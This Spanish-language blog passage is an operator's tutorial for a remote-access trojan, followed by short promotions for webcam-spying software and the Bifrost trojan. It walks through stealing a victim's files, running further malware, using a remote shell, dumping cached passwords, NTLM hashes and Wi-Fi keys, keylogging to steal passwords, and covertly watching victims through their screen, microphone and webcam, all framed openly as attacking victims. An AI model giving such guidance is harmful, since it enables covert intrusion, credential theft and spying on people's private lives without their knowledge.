sirve para ver todos archivos en la PC de la victima…
con esta opcion podemos refresar la ventana, buscar archivos o carpetas, ver iconos grandes, subir archivos o carpetas, descargar archivos o carpetas, ejecutar archivos de forma visible u oculta, renombrar archivos o carpetas, borrar archivos normalmente o de manera segura. esto es util por ejemplo si keremos robar un archivo o si keremos ejecutar algun otro virus en la PC infectada..
luego tenemos en manager, Search
sirve para buscar archivos en la PC de la victima
explico:
File name: aqui va el nombre del archivo.
A word in the file: si no sabemos el nobmre, escribimos alguna palabra ke contenga
Search in: donde buscar
Include subdirectories: opcion para que busque en los subdirectorios de la busqueda
Fuzzy: si la seleccionamos, va a encontrar cualquier archivo que contenga nuestra palabra de busqueda.
Case sensitive: para que mayusculas y minusculas coincidan
Search:comenzar busqueda
Stop:detener busqueda
luego tenemos en manager, regedit
sirve para acceder a los registros de la PC infectada
luego en manager, tenemos regedit-search
sirve para buscar un registro en especifico y se usa de la misma manera que el buscador de archivos, solo se le agregan las opciones valores y claves
ahora esta la opcion processes, donde miramos los procesos de la victima
con el boton derecho podemos refrescar, matar procesos, suspender procesos y guardar un archivo
ahora tenemos la opcion services, que sirve para ver los servicios que esta utilizando la PC infectada
con el clic derecho podemos:
refrescar, guardar a un archivo, iniciar o detener un servicio, editar, instalar y desinstalar servicios.
luego tenemos la opcion installed aplications, que nos muestra los programas instalados en la PC infectada…
aqui con el clic derecho podemos refrescar la ventada, desinstalar una aplicacion o guardar un archivo
ahora vamos con windows, que es donde estan todas las ventanas en uso
con esta opcion podemos refrescar, capturar la ventana, enviar teclas para que sean presionadas en la PC remota, mostrar la ventana en la PC remota, esconder la ventana, maximizar, minimizar y cerrar la ventana.
bueno, ahora pasamos a tools, lo primero que tenemos ahi es relay
esta opcion nos sirve para ver y manipular el trafico entre los diferentes proxys y servers. Esta opcion es valida si nosotros agregamos algun servidor intermedio cuando configuramos el server (en Socks4).
Se pueden capturar passwords, nombres de usuario e informacion que hayan quedado registrados a lo largo de la conexion que establecimos a traves de los proxys. Tambien tiene opciones de filtro, para que no aparezca informacion que no queramos.
luego de esto tenemos la opcion Active ports
sirve para ver que puertos TCP y UDP estan abiertos en la PC de la victima. Es lo mismo que hacer un netstat
con el clic derecho en esta opcion podemos refrescar, guardar a un archivo, resolver el DNS, capturar paquetes, matar la conexion y matar el proceso.
luego esta la opcion remote shell
sirve para manejar la consola MS-DOS de la PC infectada
Para activarla hay que hacer clic derecho y elegir la opcion “Activate”. Tambien podemos guardar el registro a un archivo y limpiar la ventana
luego vamos con la opcion passwords audits, ahi tenemos tres opciones Cached, NT/NTLM Hashes y Wireless
primero Cached, son los passwords ke kedan en los exploradores y mensajeros (creo)
NT/NTLM Hashes, me parece que son los passwords de windows ^^
y Wireless, los passwords de las conexiones wireless ke ha usado la PC infectada
———-
bueno, ahora pasamos a surveillance empezando por keylogger
este es el que capta todas las pulsaciones de teclas que se han hecho n la PC infectada, ideal para robar password
luego tenemos audio capture, para escuchar lo que escucha la victima
luego esta screen capture, que puede servir como un escritorio remoto
Stretch:sirve para ajustar la pantalla de la victima a la ventana.
Mouse:sirve para manejar el mouse de la victima y poder clickear en donde queramos.
Keyboard:sirve para manejar el teclado de la victima y poder escribir en donde queramos.
Interval:es el intervalo de tiempo en que se toma una y otra captura.
Start:comienza a capturar pantallazos seguidamente.
Single:captura un unico pantallazo.
Save:sirve para guardar la pantalla en un archivo. Si seleccionamos “Autosave” se guardaran todas las que se capturen.
Options:sirve para cambiar el tamaño y la calidad de la pantalla.
y por ultimo webcam capture que captura imagenes a travez de la webcam de la victima ^^
funciona de la misma manera que screen capture
luego en la seccion plug ins, donde iran todos los plug ins ke le instalemos al troyano, nos viene la opcion port scanner 1.0.0 que sirve para escanear remotamente los puertos abiertos de la PC infectada
luego en las opciones de administracion encontramos
Edit ID: que sirve para cambiar el nombre de la victima que aparece cuando se conecta con nosotros
share: que sirve para agregar otra ip o servidor de no-ip y asi compartir al conexion de la victima con alguien
DNS/Port: aca agregaremos la nueva IP o dominio NO-IP.
ID: el nombre con el que se conectara la victima en ese nuevo dominio.
Password: la clave del server en ese nuevo dominio.
Socks4:si se quieren agregar proxys o servidores intermedios.
Run in Same Process/New Process: para que el server se ejecute en el mismo proceso o uno nuevo.
Privileges: para que el server compartido tenga los permisos apropiados. Full (el server compartido tiene acceso a todas las opciones), Normal (al server compartido no se le esta permitido cambiar opciones de administracion del server), Restricted (al server compartido no se le esta permitido utilizar opciones peligrosas).
Update: actualizar el server a uno nuevo que hayamos creado.
Restart: resetear el server.
Uninstall: desinstalar el server.
espero este tutorial le haya servido de algo a alguien XD… comentarios, puteadas, halagos, insultos, todo aca ^^
Programa que le permitirá controlar la cámaraWeb de su víctima, con este programa podrá observar todo lo hace su víctima al conectarse enInternet, cuando esta en su PC, sin levantar ninguna sospecha, cada vez que se conecte a Internetdeberá obtener la IP para poder conectarse a su PC y poder ver imagenes con su Webcam y hasta tomar fotografías.
Muy recomendado!.
January 4th, 2008
Categories: troyanos | Autor: admin | Comments: Comments Off |
Bifrost es un troyano de conexion inversa, esto significa que el server se conecta a tu pc en vez de que tengas que conectarte vos a el, necesitando su ip. En estos momentos es unos de los mejores troyanos.
Características: Cam Capture, File Manager, File Search, Offline/Online Keylogger, Password List (protected storage, cached passwords, icq, cd keys), Polymorphic Plugin, Process List, Remote Shell, Screen Capture, System Info and Windows List.